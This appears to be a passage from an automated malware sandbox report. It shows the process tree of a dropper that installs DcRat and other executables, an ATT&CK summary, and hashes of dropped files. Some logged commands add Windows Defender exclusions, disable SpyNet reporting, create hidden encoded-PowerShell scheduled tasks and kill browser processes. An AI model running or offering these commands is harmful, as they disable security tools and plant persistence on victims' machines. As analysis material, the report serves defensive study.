- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3612 -s 6603⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3612 -s 6563⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3612 -s 7803⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3612 -s 7483⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3612 -s 9963⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3612 -s 10323⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3612 -s 14083⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3612 -s 6283⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3612 -s 10883⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exe"C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exe"2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1wNij72⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffadc3246f8,0x7ffadc324708,0x7ffadc3247183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,10334633456463974671,2748795355878468169,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,10334633456463974671,2748795355878468169,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\Installation.exe"C:\Users\Admin\AppData\Local\Temp\Installation.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Folder.exe"C:\Users\Admin\AppData\Local\Temp\Folder.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
-
C:\Windows\SysWOW64\rUNdlL32.eXe"C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",axhub3⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3760 -s 6084⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\pzyh.exe"C:\Users\Admin\AppData\Local\Temp\pzyh.exe"2⤵
- DcRat
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\pub2.exe"C:\Users\Admin\AppData\Local\Temp\pub2.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\Info.exe"C:\Users\Admin\AppData\Local\Temp\Info.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\88_AKQYj8XKniHVblGMGInY1.exe"C:\Users\Admin\Documents\88_AKQYj8XKniHVblGMGInY1.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5948 -s 4604⤵
- Program crash
-
C:\Users\Admin\Documents\Q9TMJHcyWJ57WbegY93a0ML8.exe"C:\Users\Admin\Documents\Q9TMJHcyWJ57WbegY93a0ML8.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Netdhcpsvc\77FTyD6gK21dfSGhRqsixY3e.vbe"4⤵
- Checks computer location settings
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Netdhcpsvc\jGDslx6begqObyzNRSfaWpJOf.bat" "5⤵
-
C:\Netdhcpsvc\NetdhcpsvcDriverintocrt.exe"C:\Netdhcpsvc\NetdhcpsvcDriverintocrt.exe"6⤵
- DcRat
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Drops file in System32 directory
- Drops file in Program Files directory
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\wdag\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\wdag\identity_helper.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\A6K08m5pRpo6aGMX_AWxJpZ6.exe"C:\Users\Admin\Documents\A6K08m5pRpo6aGMX_AWxJpZ6.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\HiCCOQU8W2MgCEoQfgwK62LY.exe"C:\Users\Admin\Documents\HiCCOQU8W2MgCEoQfgwK62LY.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im HiCCOQU8W2MgCEoQfgwK62LY.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\HiCCOQU8W2MgCEoQfgwK62LY.exe" & del C:\ProgramData\*.dll & exit4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im HiCCOQU8W2MgCEoQfgwK62LY.exe /f5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 65⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Documents\1RtnrOsPJsTdMrVTQK_5xpeq.exe"C:\Users\Admin\Documents\1RtnrOsPJsTdMrVTQK_5xpeq.exe"3⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe5⤵
- Kills process with taskkill
-
C:\Users\Admin\Documents\nn3clCgMOnoaDCpiVeYozBOV.exe"C:\Users\Admin\Documents\nn3clCgMOnoaDCpiVeYozBOV.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5884 -s 4604⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5884 -s 4684⤵
- Program crash
-
C:\Users\Admin\Documents\YKOKkaI3LsSt6IA_vuSEb54U.exe"C:\Users\Admin\Documents\YKOKkaI3LsSt6IA_vuSEb54U.exe"3⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\Documents\YKOKkaI3LsSt6IA_vuSEb54U.exe4⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 05⤵
-
C:\Users\Admin\Documents\z9bHtF5UDDCm2VBLh0RUU9Hi.exe"C:\Users\Admin\Documents\z9bHtF5UDDCm2VBLh0RUU9Hi.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\v0Bp_MkdSi3FaqCdJ94sVkiH.exe"C:\Users\Admin\Documents\v0Bp_MkdSi3FaqCdJ94sVkiH.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif4⤵
-
C:\Windows\SysWOW64\cmd.execmd5⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq BullGuardCore.exe"6⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I /N "bullguardcore.exe"6⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq PSUAService.exe"6⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I /N "psuaservice.exe"6⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^uEDzPzHFCdzewXWMRhXuwzGNjMXXrsYuMnTuDfFnaaWMxrxJAnNdPOrNYPircJBlshdCrQoBHnNIvTzoshbFDH$" Koubbeh.gif6⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pifAccostarmi.exe.pif N6⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\waitfor.exewaitfor /t 5 jFjyKdbHiNcpqGHLaDXhhIXfDT6⤵
-
C:\Users\Admin\Documents\FrkWCoBi3Z2dPBaJvUIiG48f.exe"C:\Users\Admin\Documents\FrkWCoBi3Z2dPBaJvUIiG48f.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7zSD47.tmp\Install.exe.\Install.exe4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7zS1B51.tmp\Install.exe.\Install.exe /S /site_id "525403"5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&7⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:328⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:648⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&7⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:328⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:648⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gCdSmyxdh" /SC once /ST 00:22:41 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="6⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gCdSmyxdh"6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gCdSmyxdh"6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 01:04:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\ZUUWRPE.exe\" j6 /site_id 525403 /S" /V1 /F6⤵
- DcRat
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\eim8dzujv6RVgvDjU2rBScoJ.exe"C:\Users\Admin\Documents\eim8dzujv6RVgvDjU2rBScoJ.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6072 -s 7924⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6072 -s 8124⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6072 -s 12924⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6072 -s 13004⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6072 -s 13444⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6072 -s 13244⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "eim8dzujv6RVgvDjU2rBScoJ.exe" /f & erase "C:\Users\Admin\Documents\eim8dzujv6RVgvDjU2rBScoJ.exe" & exit4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "eim8dzujv6RVgvDjU2rBScoJ.exe" /f5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6072 -s 12964⤵
- Program crash
-
C:\Users\Admin\Documents\pLi5dA69x4EhZad08LfBG3Z2.exe"C:\Users\Admin\Documents\pLi5dA69x4EhZad08LfBG3Z2.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\TN1xzgBTrmoLCEkc7PAVekRf.exe"C:\Users\Admin\Documents\TN1xzgBTrmoLCEkc7PAVekRf.exe"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6060 -s 4604⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6060 -s 4564⤵
- Program crash
-
C:\Users\Admin\Documents\rAygDhsCG3o6w9CTNCgqbkYH.exe"C:\Users\Admin\Documents\rAygDhsCG3o6w9CTNCgqbkYH.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5960 -s 4604⤵
- Program crash
-
C:\Users\Admin\Documents\6GxkmH81UFeTL6uaB914G5CB.exe"C:\Users\Admin\Documents\6GxkmH81UFeTL6uaB914G5CB.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 3612 -ip 36121⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 3612 -ip 36121⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3760 -ip 37601⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 3612 -ip 36121⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 3612 -ip 36121⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3612 -ip 36121⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 3612 -ip 36121⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 3612 -ip 36121⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 3612 -ip 36121⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5948 -ip 59481⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5960 -ip 59601⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5960 -s 4681⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5884 -ip 58841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3496 -ip 34961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 6060 -ip 60601⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1540 -ip 15401⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 6072 -ip 60721⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 3496 -ip 34961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 1540 -ip 15401⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 6072 -ip 60721⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 5960 -ip 59601⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 6072 -ip 60721⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 5948 -ip 59481⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 5884 -ip 58841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 6060 -ip 60601⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 6072 -ip 60721⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6072 -ip 60721⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 6072 -ip 60721⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 6072 -ip 60721⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 6072 -ip 60721⤵
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "identity_helper" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\wdag\identity_helper.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Install" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Temp\18e190413af045db88dfbd29609eb877\Install.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Install" /sc ONLOGON /tr "'C:\Program Files\Common Files\DESIGNER\Install.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msedge" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft\Edge\Application\msedge\msedge.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 6072 -ip 60721⤵
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\System32\wbem\WmiPerfClass\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\ProgramData\Oracle\Java\javapath\cmd.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\System32\fms\dllhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Executes dropped EXE
- Creates scheduled task(s)
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Users\Admin\AppData\Roaming\ttthwfeC:\Users\Admin\AppData\Roaming\ttthwfe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 3612 -ip 36121⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 716 -p 3612 -ip 36121⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Modify Registry
3Disabling Security Tools
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751MD5
54e9306f95f32e50ccd58af19753d929
SHA1eab9457321f34d4dcf7d4a0ac83edc9131bf7c57
SHA25645f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72
SHA5128711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868MD5
67b7659c80d84f2cfea409d5d799c66d
SHA1c763557660bce28a32065d1841c3a9b075c8bd49
SHA2560022718f150af0c4c780c8b18dd21421b9c9028b05434b617d0b53b6446ac213
SHA512a1b9e66a3f01947ef1e287a7a8251d973fcba0239280b6df71c0f4c62bf1357ed9d454bad47c84d1419262d18624db5056ff1fde2c64879cf3e8b3ba7a26030f
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751MD5
2ebe06e4081f2fdf8cdedaaa2e27eb9f
SHA1c2358bb8c120cab2f279e1afc5c8f1c0b8df2668
SHA25652d2883c0060c6e8f98876395c4bd54382fbb81c066f91a42e6f40e0f3d1c478
SHA512f4d4bd485c0a1a0bb57d21143917719c7fa59d4891e582ce934a120a000df5312f7f25950652a2caa4a18070b68953d17f13a46aa56af6fdd72d46c22d05a918
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868MD5
64179da098fa9571c52e8e781d833b47
SHA1ab832c444f1eebf0528f16a1b72e0f7aa54f5141
SHA25616f0b2746458aa2cd74a63aa05afcdd087e70f32dd07f4e2aae7402e49d4c387
SHA51226d49bbc9258d94621d763225f6e6377cbc08d475f9e633df32eedc3a9b622c7005b28e5f43286b799c5c112f434ef137a2a7343a3aa01d348ccd173b2871c9d
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datMD5
78afdcc28744f3ccc897189551e60a14
SHA16408c2447363d821dc659254a324456ed16207ec
SHA256ad06579bc070fec03adb35db5fcba1015c52ac2c5dd2ffec9ecff4301bfe70c7
SHA5128e6e1433fef7868a51e78fe1f899afe608e1dc2dcf86a02f21fe579fa4b4eef36a9a63628a443067203e19cd31971d6599cccd091b74e1d5fca5d2aff4428078
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datMD5
de477c625e69a07beb047419ff93d06a
SHA1e843c5967dffa6ebd94c3083da5a14b60233de04
